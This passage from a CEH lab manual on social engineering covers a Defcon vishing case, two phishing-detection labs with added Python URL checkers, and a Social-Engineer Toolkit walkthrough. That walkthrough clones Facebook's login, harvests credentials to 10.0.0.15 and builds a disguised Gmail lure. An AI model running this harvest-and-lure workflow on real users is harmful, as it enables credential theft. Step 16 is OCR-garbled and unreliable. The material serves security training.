
CEH Lab Manual

Module 09 - Social Engineering

Social Engineering
Social engineering is the art of convincing people to reveal confidential information.

Lab Scenario

Valuable source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.html

Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term "social engineering" can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack to win a coveted "black badge" in the "social engineering" contest at the Defcon hackers' conference in Las Vegas.

In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:
■ The small-town Canadian Wal-Mart store's janitorial contractor
■ Its cafeteria food-services provider
■ Its employee pay cycle
■ Its staff shift schedule
■ The time managers take their breaks
■ Where they usually go for lunch
■ Type of PC used by the manager
■ Make and version numbers of the computer's operating system, and
■ Its web browser and antivirus software

Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in to the extent of coughing up so much scam-worthy treasure.

Calling from his sound-proofed booth at Defcon, MacDougall placed an "urgent" call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

CEH Lab Manual Page 675 Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract.

"Darnell" said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations. But first, he told the store manager, he needed a thorough picture of how the store operated.

In the conversation, which lasted about 10 minutes, "Darnell" described himself as a newly hired manager of government logistics. He also spoke offhand about the contract: "All I know is Wal-Mart can make a ton of cash off it," he said, then went on to talk about his upcoming visit, keeping up a "steady patter" about the project and life in Bentonville, Cowley writes.

As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit. The compliant manager obliged, plugging the address into his browser. When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers are verboten, given that Defcon has no great desire to bring the law down on its head.

Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

MacDougall said, "Companies are way more aware about their security. They've got firewalls, intrusion detection, log-in systems going into place, so it's a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren't protecting, which is the people."
MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:
■ Never be afraid to say no. If something feels wrong, something is wrong
■ An IT department should never be calling asking about operating systems, machines, passwords or email systems—they already know
■ Set up an internal company security word of the day and don't give any information to anyone who doesn't know it
■ Keep tabs on what's on the web. Companies inadvertently release tons of information online, including through employees' social media sites

As an expert ethical hacker and penetration tester, you should circulate the best practices to be followed among the employees.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
The objective of this lab is to:
■ Detect phishing sites
■ Protect the network from phishing attacks

To carry out this lab, you need:
■ A computer running Windows Server 2012
■ A web browser with Internet access

Lab Duration
Time: 20 Minutes

Overview
Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

Lab Tasks
Recommended labs to assist you in social engineering:
■ Social engineering
■ Detecting phishing using Netcraft
■ Detecting phishing using PhishTank

Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Detecting Phishing Using Netcraft

Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

Lab Scenario

By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer.

Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies. Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging, and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forgery. The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will be learning to detect phishing using Netcraft.


Lab Objectives
This lab will show you phishing sites using a web browser and show you how to use them. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

To carry out this lab you need:
■ Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar
■ You can also download the latest version of Netcraft Toolbar from the link http://toolbar.netcraft.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access
■ Administrative privileges to run the Netcraft toolbar

Lab Duration
Time: 10 Minutes

Overview of Netcraft Toolbar
Netcraft Toolbar provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet.

Lab Tasks
TASK 1: Anti-Phishing Toolbar
1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.


You can also download the Netcraft toolbar from http://toolbar.netcraft.com

FIGURE 1.1: Windows Server 2012-Start Menu

3. Click the Mozilla Firefox app to launch the browser.

FIGURE 1.2: Windows Server 2012-Start Menu Apps view

4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser or drag and drop the netcraft_toolbar-1.7-fx.xpi file in Firefox.
5. In this lab, we are downloading the toolbar from the Internet.
6. In Firefox browser, click Download the Netcraft Toolbar to install as the add-on.

Netcraft provides Internet security services, including anti-fraud and anti-phishing services.

FIGURE 1.3: Netcraft toolbar downloading Page


7. On the Install page of the Netcraft Toolbar site, click the Firefox image to continue with installation.

Netcraft is an Internet services company based in Bath, England.

FIGURE 1.4: Netcraft toolbar Installation Page

8. Click Allow to download Netcraft Toolbar.

FIGURE 1.5: Netcraft toolbar Installation-Allow button

9. When the Software Installation dialog box appears, click Install Now.

Software Installation
Install add-ons only from authors whom you trust.
Malicious software can damage your computer or violate your privacy.
You have asked to install the following item:
Netcraft Anti-Phishing Toolbar (Netcraft Ltd)
http://releases.mozilla.org/pub/mozilla.org/addons/1326/netcraft_toolbar-1.5-fx.xpi
Install Now / Cancel

Netcraft Toolbar provides a wealth of information about the sites you visit.

FIGURE 1.6: Installing Netcraft Toolbar

10. To complete the installation it will ask you to restart the browser. Click Restart Now.


Risk Rating displays the trustworthiness of the current

FIGURE 1.7: Restarting Firefox browser

11. Netcraft Toolbar is now visible. Once the Toolbar is installed, it looks similar to the following figure.

FIGURE 1.8: Netcraft Toolbar on Mozilla Firefox web browser

12. When you visit a site, the following information displays in the Toolbar (unless the page has been blocked): Risk rating, Rank, and Flag.
13. Click Site Report to show the report of the site.

Site report links to detailed report for the

FIGURE 1.9: Report generated by Netcraft Toolbar

14. If you attempt to visit a page that has been identified as a phishing page by Netcraft Toolbar you will see a warning dialog that looks similar to the one in the following figure.
15. Type, as an example: http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin


Phishing site feeds: a continuously updated encrypted database of patterns that match phishing URLs reported by the Netcraft Toolbar.

FIGURE 1.10: Warning dialog for blocked site

16. If you trust that page click Yes to open it and if you don't, click No (Recommended) to block that page.
17. If you click No the following page will be displayed.

FIGURE 1.11: Web page blocked by Netcraft Toolbar
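The sample URL in step 15 shows the pattern a toolbar is flagging: a trusted brand name placed in a subdomain under an unrelated registrable domain. The following Python script is an added example written for this manual, not Netcraft's code. It shows the lexical checks a defender can run on a URL before it reaches a browser or a mail gateway; the brand list and the public-suffix set are constructed assumptions (a real deployment would use the Public Suffix List and a centrally maintained brand list).

```python
# Added example (not Netcraft's code): lexical checks that flag a URL whose host
# name carries a well-known brand outside that brand's own registrable domain,
# the pattern of the lab's sample URL http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin
from urllib.parse import urlsplit

# Constructed assumption: brand tokens and the registrable domains that may
# legitimately carry them. A real deployment maintains this list centrally.
PROTECTED_BRANDS = {
    "paypal": {"paypal.com", "paypal.ca"},
    "walmart": {"walmart.com", "walmart.ca"},
}

# Constructed assumption: a tiny stand-in for the Public Suffix List.
PUBLIC_SUFFIXES = {"com", "net", "org", "ca", "mx", "co.uk", "com.mx"}


def registrable_domain(host):
    """Return the registrable domain (public suffix plus one label) of host."""
    labels = host.lower().rstrip(".").split(".")
    # Try the longer (two-label) suffix first so "paypal.com.mx" is not cut to "com.mx".
    for n in (2, 1):
        if len(labels) > n and ".".join(labels[-n:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[-(n + 1):])
    return ".".join(labels)


def assess_url(url):
    """Return (verdict, reasons) where verdict is 'suspicious' or 'ok'.

    Checks are purely lexical; they complement, not replace, a reputation feed.
    """
    parts = urlsplit(url if "://" in url else "http://" + url)
    host = parts.hostname or ""
    reg_dom = registrable_domain(host)
    reasons = []

    # 1. Brand name present in the host, but the registrable domain is not the brand's.
    for brand, legit_domains in PROTECTED_BRANDS.items():
        if brand in host and reg_dom not in legit_domains:
            reasons.append(f"brand '{brand}' in host but registrable domain is {reg_dom}")

    # 2. Unusually deep host name (five or more labels) is a common disguise.
    if host.count(".") >= 4:
        reasons.append(f"deep host name with {host.count('.') + 1} labels")

    # 3. Purely numeric label, as in "6551" in the sample URL.
    if any(label.isdigit() for label in host.split(".")):
        reasons.append("numeric label in host name")

    # 4. Userinfo before '@' lets a look-alike name precede the real host.
    if "@" in parts.netloc:
        reasons.append("userinfo '@' in authority hides the real host")

    return ("suspicious" if reasons else "ok"), reasons


if __name__ == "__main__":
    for u in ("http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",
              "https://www.paypal.com/signin",
              "http://www.paypal.com@evil.example/"):
        verdict, why = assess_url(u)
        print(verdict, u, *why, sep="\n  ")
```

The sample URL trips three of the four checks (brand outside its domain, six host labels, a numeric label); the genuine PayPal sign-in page trips none. The userinfo check covers a case the lab's example does not: a URL such as http://www.paypal.com@evil.example/ is parsed by browsers with evil.example as the host, so the brand never appears in the host at all.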

Lab Analysis
Document all the results and report gathered during the lab.

Tool/Utility | Information Collected/Objectives Achieved
Netcraft | ■ Phishing site detected

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate whether the Netcraft Toolbar works if you use a transparent proxy.


2. Determine if you can make the Netcraft Toolbar coexist on the same line as other toolbars. If so, how?
3. How can you stop the Toolbar warning if a site is trusted?

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☑ Classroom ☐ iLabs


Detecting Phishing Using PhishTank

PhishTank is a collaborative clearinghouse for data and information regarding phishing on the Internet.

Lab Scenario

Phishing is an attempt by an individual or group to solicit personal information from unsuspecting users by employing social engineering techniques. Phishing emails are crafted to appear as if they have been sent from a legitimate organization or known individual. These emails often attempt to entice users to click on a link that will take the user to a fraudulent website that appears legitimate. The user then may be asked to provide personal information such as account user names and passwords that can further expose them to future compromises. Additionally, these fraudulent websites may contain malicious code.

With the tremendous increase in the use of online banking, online share trading, and ecommerce, there has been a corresponding growth in the incidents of phishing being used to carry out financial frauds. Phishing involves fraudulently acquiring sensitive information (e.g. passwords, credit card details etc.) by masquerading as a trusted entity.

In the previous lab you have already seen how a phishing site can be detected using the Netcraft tool.

The usual scenario is that the victim receives an email that appears to have been sent from his bank. The email urges the victim to click on the link in the email. When the victim does so, he is taken to "a secure page on the bank's website." The victim believes the web page to be authentic and he enters his user name, password, and other information. In reality, the website is a fake and the victim's information is stolen and misused.

Being an administrator or penetration tester, you might implement all the most sophisticated and expensive technology solutions in the world; all of it can be bypassed if your employees fall for simple social engineering scams. It becomes your responsibility to educate employees on best practices for protecting information.

Phishing sites or emails can be reported to phishing-report@us-cert.gov
http://www.us-cert.gov/nav/report_phishing.html

US-CERT (United States Computer Emergency Readiness Team) is collecting phishing email messages and website locations so that they can help people avoid becoming victims of phishing scams.

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Objectives
This lab will show you how to use phishing sites using a web browser. It will teach you how to:
■ Detect phishing sites
■ Protect the network from phishing attacks

Lab Environment
To carry out the lab you need:
■ A computer running Windows Server 2012
■ A web browser (Firefox, Internet Explorer, etc.) with Internet access

Lab Duration
Time: 10 Minutes

Overview of PhishTank
PhishTank URL: http://www.phishtank.com

PhishTank is a free community site where anyone can submit, verify, track, and share phishing data. PhishTank is a collaborative clearing house for data and information regarding phishing on the Internet. Also, PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.
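For a developer, PhishTank's value is the data it exposes rather than the "Is it a phish?" form used in this lab. The following Python script is an added example, not PhishTank's or OpenDNS's code: it loads a small constructed feed in the shape of PhishTank's verified-phish data (the field names phish_id, url, verified, online and target are an assumption about that feed) and looks a URL up against it. The lookup normalises scheme, case, default port and trailing slash first, because a plain string comparison would miss HTTP://SDAPLD21.HOST21.COM against a recorded http://sdapld21.host21.com/, and it falls back to a host-level match so other paths on a known phishing host are still surfaced.

```python
# Added example (not PhishTank's or OpenDNS's code): look a URL up in a locally
# cached copy of a PhishTank-style verified-phish feed, with URL normalisation.
import json
from urllib.parse import urlsplit, urlunsplit

# Constructed sample feed. Field names follow PhishTank's public data feed as an
# assumption; the records themselves are invented for this example.
SAMPLE_FEED_JSON = """[
  {"phish_id": 9000001, "url": "http://sdapld21.host21.com/", "verified": "yes",
   "online": "yes", "target": "Other"},
  {"phish_id": 9000002, "url": "http://www.paypal.ca.6551.secure7c.mx/images/cgi.bin",
   "verified": "yes", "online": "no", "target": "PayPal"},
  {"phish_id": 9000003, "url": "http://unverified.example/login", "verified": "no",
   "online": "yes", "target": "Other"}
]"""


def normalize_url(url):
    """Canonical form: lower-case scheme and host, default port dropped, fragment
    removed, a bare host gets path '/', and a trailing slash on a longer path is cut."""
    parts = urlsplit(url.strip())
    host = (parts.hostname or "").rstrip(".")
    default_port = {"http": 80, "https": 443}.get(parts.scheme.lower())
    port = parts.port
    netloc = host if port in (None, default_port) else f"{host}:{port}"
    path = parts.path.rstrip("/") or "/"
    return urlunsplit((parts.scheme.lower(), netloc, path, parts.query, ""))


class PhishFeed:
    """Index of verified feed entries by normalised URL and by host."""

    def __init__(self, feed_json):
        self.by_url = {}
        self.by_host = {}
        for rec in json.loads(feed_json):
            if rec.get("verified") != "yes":
                continue  # unverified submissions are not treated as detections
            norm = normalize_url(rec["url"])
            self.by_url[norm] = rec
            self.by_host.setdefault(urlsplit(norm).hostname, []).append(rec)

    def lookup(self, url):
        """Return a dict whose verdict is 'phish' (exact URL match),
        'suspicious' (same host as a verified phish) or 'unknown'."""
        norm = normalize_url(url)
        if norm in self.by_url:
            rec = self.by_url[norm]
            return {"verdict": "phish", "match": "url",
                    "phish_id": rec["phish_id"], "online": rec["online"] == "yes"}
        host = urlsplit(norm).hostname
        if host in self.by_host:
            rec = self.by_host[host][0]
            return {"verdict": "suspicious", "match": "host",
                    "phish_id": rec["phish_id"], "online": rec["online"] == "yes"}
        return {"verdict": "unknown", "match": None, "phish_id": None, "online": None}


FEED = PhishFeed(SAMPLE_FEED_JSON)

if __name__ == "__main__":
    for u in ("HTTP://SDAPLD21.HOST21.COM", "http://sdapld21.host21.com/login.php",
              "http://unverified.example/login", "https://www.example.com/"):
        print(u, FEED.lookup(u))
```

Only entries marked verified are indexed, mirroring the distinction the lab's later question draws between a listed phish and one PhishTank has not yet verified; an "unknown" verdict therefore means "not in the verified feed", not "safe", which is why a feed lookup is normally paired with lexical checks such as those in the Netcraft lab.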

Lab Tasks
TASK 1: PhishTank
1. To start this lab you need to launch a web browser first. In this lab we have used Mozilla Firefox.
2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.


FIGURE 2.1: Windows Server 2012-Start Menu

3. Click the Mozilla Firefox app to launch the browser.

PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

FIGURE 2.2: Windows Server 2012-Start Menu Apps view

4. Type http://www.phishtank.com in the address bar of the web browser and press Enter.
5. You will see the following:

FIGURE 2.3: Welcome screen of PhishTank


PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.

6. Type the website URL to be checked for phishing, for example, http://sdapld21.host21.com.
7. Click Is it a phish?.

FIGURE 2.4: Checking for site

If the site is a phishing site, you see the following warning dialog box.

OpenDNS is interested in having the best available information about phishing websites.

Submission #1571567 is currently ONLINE. No screenshot yet: we have not yet successfully taken a screenshot of the submitted website.

FIGURE 2.5: Warning dialog for phishing site

Lab Analysis
Document all the websites and verify whether they are phishing sites.

Tool/Utility | Information Collected/Objectives Achieved
PhishTank | ■ Phishing site detected


PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions
1. Evaluate what PhishTank wants to hear about spam.
2. Does PhishTank protect you from phishing?
3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?

Internet Connection Required
☑ Yes ☐ No

Platform Supported
☑ Classroom ☐ iLabs


Social Engineering Penetration Testing using Social Engineering Toolkit (SET)

The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.

Lab Scenario

Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available with underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages and attach malicious files and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once.

Though numerous sorts of attacks can be performed using this toolkit, this is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community.

As an ethical hacker, penetration tester, or security administrator, you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.

Lab Objectives
The objective of this lab is to help students learn to:
■ Clone a website
■ Obtain user names and passwords using the Credential Harvester method
■ Generate reports for conducted penetration tests


Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

Lab Environment
To carry out the lab, you need:
■ Run this tool in BackTrack Virtual Machine
■ Web browser with Internet access
■ Administrative privileges to run tools

Lab Duration
Time: 10 Minutes

Overview of Social Engineering Toolkit
Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

Lab Tasks
TASK 1: Execute Social Engineering Toolkit
1. Log in to your BackTrack virtual machine.
2. Select Applications → BackTrack → Exploitation Tools → Social Engineering Tools → Social Engineering Toolkit and click Set.

FIGURE 3.1: Launching SET in BackTrack


3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service.

SET has been presented at large-scale conferences including Blackhat, DerbyCon, Defcon, and ShmooCon.

FIGURE 3.2: SET Service Agreement option

The web jacking attack is performed by replacing the victim's browser with another window that is made to look and appear to be a legitimate site.

4. You will be presented with a list of menus to select the task. Type 1 and press Enter to select the Social-Engineering Attacks option.

Note: SET allows you to specially craft email messages and send them to a large (or small) number of people with attached file format malicious payloads.

[Screenshot: SET main menu in the Terminal]
Homepage: https://www.trustedsec.com

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs.

Join us on irc.freenode.net in channel #setoolkit

The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

  1) Social-Engineering Attacks
  2) Fast-Track Penetration Testing
  3) Third Party Modules
  4) Update the Metasploit Framework
  5) Update the Social-Engineer Toolkit
  6) Update SET configuration
  7) Help, Credits, and About

 99) Exit the Social-Engineer Toolkit

FIGURE 3.3: SET Main menu

5. A list of menus in Social-Engineering Attacks will appear; type 2 and press Enter to select Website Attack Vectors.

CEH Lab Manual Page 692 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 09 - Social Engineering

Note: The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

[Screenshot: Social-Engineering Attacks menu in the Terminal]
Join us on irc.freenode.net in channel #setoolkit
The Social-Engineer Toolkit is a product of TrustedSec.

Visit: https://www.trustedsec.com

Select from the menu:

  1) Spear-Phishing Attack Vectors
  2) Website Attack Vectors
  3) Infectious Media Generator
  4) Create a Payload and Listener
  5) Mass Mailer Attack
  6) Arduino-Based Attack Vector
  7) SMS Spoofing Attack Vector
  8) Wireless Access Point Attack Vector
  9) QRCode Generator Attack Vector
 10) Powershell Attack Vectors
 11) Third Party Modules

 99) Return back to the main menu.

set> 2

FIGURE 3.4: Social Engineering Attacks menu

6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.

Note: The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

[Screenshot: Website Attack Vectors menu in the Terminal]
... and the BackTrack team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its too slow/fast.

The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.

  1) Java Applet Attack Method
  2) Metasploit Browser Exploit Method
  3) Credential Harvester Attack Method
  4) Tabnabbing Attack Method
  5) Man Left in the Middle Attack Method
  6) Web Jacking Attack Method
  7) Multi-Attack Web Method
  8) Victim Web Profiler
  9) Create or import a CodeSigning Certificate

 99) Return to Main Menu

set:webattack> 3

FIGURE 3.5: Website Attack Vectors menu
7. Now, type 2 and press Enter to select the Site Cloner option from the menu.


Note: The Site Cloner is used to clone a website of your choice.

[Screenshot: Credential Harvester Attack menu in the Terminal]
  9) Create or import a CodeSigning Certificate

 99) Return to Main Menu

set:webattack> 3

The first method will allow SET to import a list of pre-defined web applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

  1) Web Templates
  2) Site Cloner
  3) Custom Import

 99) Return to Webattack Menu

set:webattack> 2

FIGURE 3.6: Credential Harvester Attack menu

8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15.
Note: The tabnabbing attack method is used when a victim has multiple tabs open; when the user clicks the link, the victim will be presented with a "Please wait while the page loads". When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.

[Screenshot: the POST-back IP prompt in the Terminal]
applications that it can utilize within the attack.

The second method will completely clone a website of your choosing and allow you to utilize the attack vectors within the completely same web application you were attempting to clone.

The third method allows you to import your own website, note that you should only have an index.html when using the import website functionality.

  1) Web Templates
  2) Site Cloner
  3) Custom Import

 99) Return to Webattack Menu

set:webattack> 2
[-] Credential harvester will allow you to utilize the clone capabilities within set
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15

FIGURE 3.7: Providing IP address in Harvester/Tabnabbing

9. Now, you will be prompted for a URL to be cloned; type the desired URL at Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.


Note: The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

[Screenshot: the URL-to-clone prompt in the Terminal]
and allow you to utilize the attack vectors within the completely
same web application you were attempting to clone.

The third method allows you to import your own website, note that you
should only have an index.html when using the import website
functionality.

  1) Web Templates
  2) Site Cloner
  3) Custom Import

 99) Return to Webattack Menu

set:webattack> 2
[-] Credential harvester will allow you to utilize the clone capabilities within set
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

FIGURE 3.8: Providing URL to be cloned

10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.

11. It will start Credential Harvester.

Note: If you're doing a penetration test, register a name that's similar to the victim, for Gmail you could do gmail.com (notice the 1), something similar that can mistake the user into thinking it's the legitimate.

[Screenshot: SET cloning the target site in the Terminal]
 99) Return to Webattack Menu

set:webattack> 2
[-] Credential harvester will allow you to utilize the clone capabilities within set
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

Press <return> to continue

FIGURE 3.9: SET Website Cloning

12. Leave the Credential Harvester Attack to fetch information from the victim's machine.


Note: When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

[Screenshot: Credential Harvester started in the Terminal]
[-] Credential harvester will allow you to utilize the clone capabilities within set
[-] to harvest credentials or parameters from a website as well as place them into a report
[-] This option is used for what IP the server will POST to.
[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
[-] SET supports both HTTP and HTTPS
[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:www.facebook.com

[*] Cloning the website: https://login.facebook.com/login.php
[*] This could take a little bit...

The best way to use this attack is if username and password form
fields are available. Regardless, this captures all POSTs on a website.
[!] I have read the above message.

Press <return> to continue

[*] Social-Engineer Toolkit Credential Harvester Attack
[*] Credential Harvester is running on port 80
[*] Information will be displayed to you as it arrives below:

FIGURE 3.10: SET Credential Harvester Attack

13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her into clicking it to browse to the IP address.

14. For this demo, launch your web browser in the BackTrack machine and open your favorite email service. In this example we have used www.gmail.com. Log in to your Gmail account and compose an email.

Note: Most of the time they won't even notice the IP but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.

FIGURE 3.11: Composing email in Gmail

15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.


[Screenshot: Gmail Compose Mail window in Mozilla Firefox on the BackTrack machine. To: an address at yahoo.com; Subject: @TGIF - Party Pictures; Body: "Hello Sam, Please click this link to view the weekend party pictures at TGIF with the celebrities. Regards."]

FIGURE 3.12: Linking Fake URL to Actual URL

16. 111 th e Edit Link w in d o w , first type th e actu al ad d ress in th e Web


add ress field u n d e r th e Link to o p tio n a n d th e n type th e fake U R L 111
th e T ext to display held. 111 tins ex am p le, th e w eb ad d re ss w e h av e
u se d is http://10 .0.0.15 a n d tex t to d isplay is
w w w .facebook.com /R ini TGIF. C lick OK
[Screenshot: Gmail Edit Link dialog over the Compose Mail window. Text to display: www.facebook.com/Rini TGIF. Link to: Web address http://10.0.0.15 ("To what URL should this link go?"). Buttons: OK, Cancel.]

FIGURE 3.13: Edit Link window

17. The fake URL should appear in the email body, as shown in the following screenshot.


[Screenshot: Gmail Compose Mail window. Subject: @TGIF - Party Pictures; Body: "Hello Sam, Please click this link www.facebook.com/Rini TGIF to view the weekend party pictures at TGIF with the celebrities. Regards."]

FIGURE 3.14: Adding Fake URL in the email content

18. To verify that the fake URL is linked to the actual URL, click the fake URL; it will display the actual URL as Go to link: followed by the actual URL. Send the email to the intended user.
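As an added defender-side example, not part of the lab manual or of SET, the following Python scans an HTML email body for the link construction built in steps 16 to 18: anchor text that names one domain while the href points somewhere else, here a bare IP address. The sample email, helper names and the benign anchors are constructed for this example.

```python
"""Flag deceptive links in an HTML email: visible text that names one
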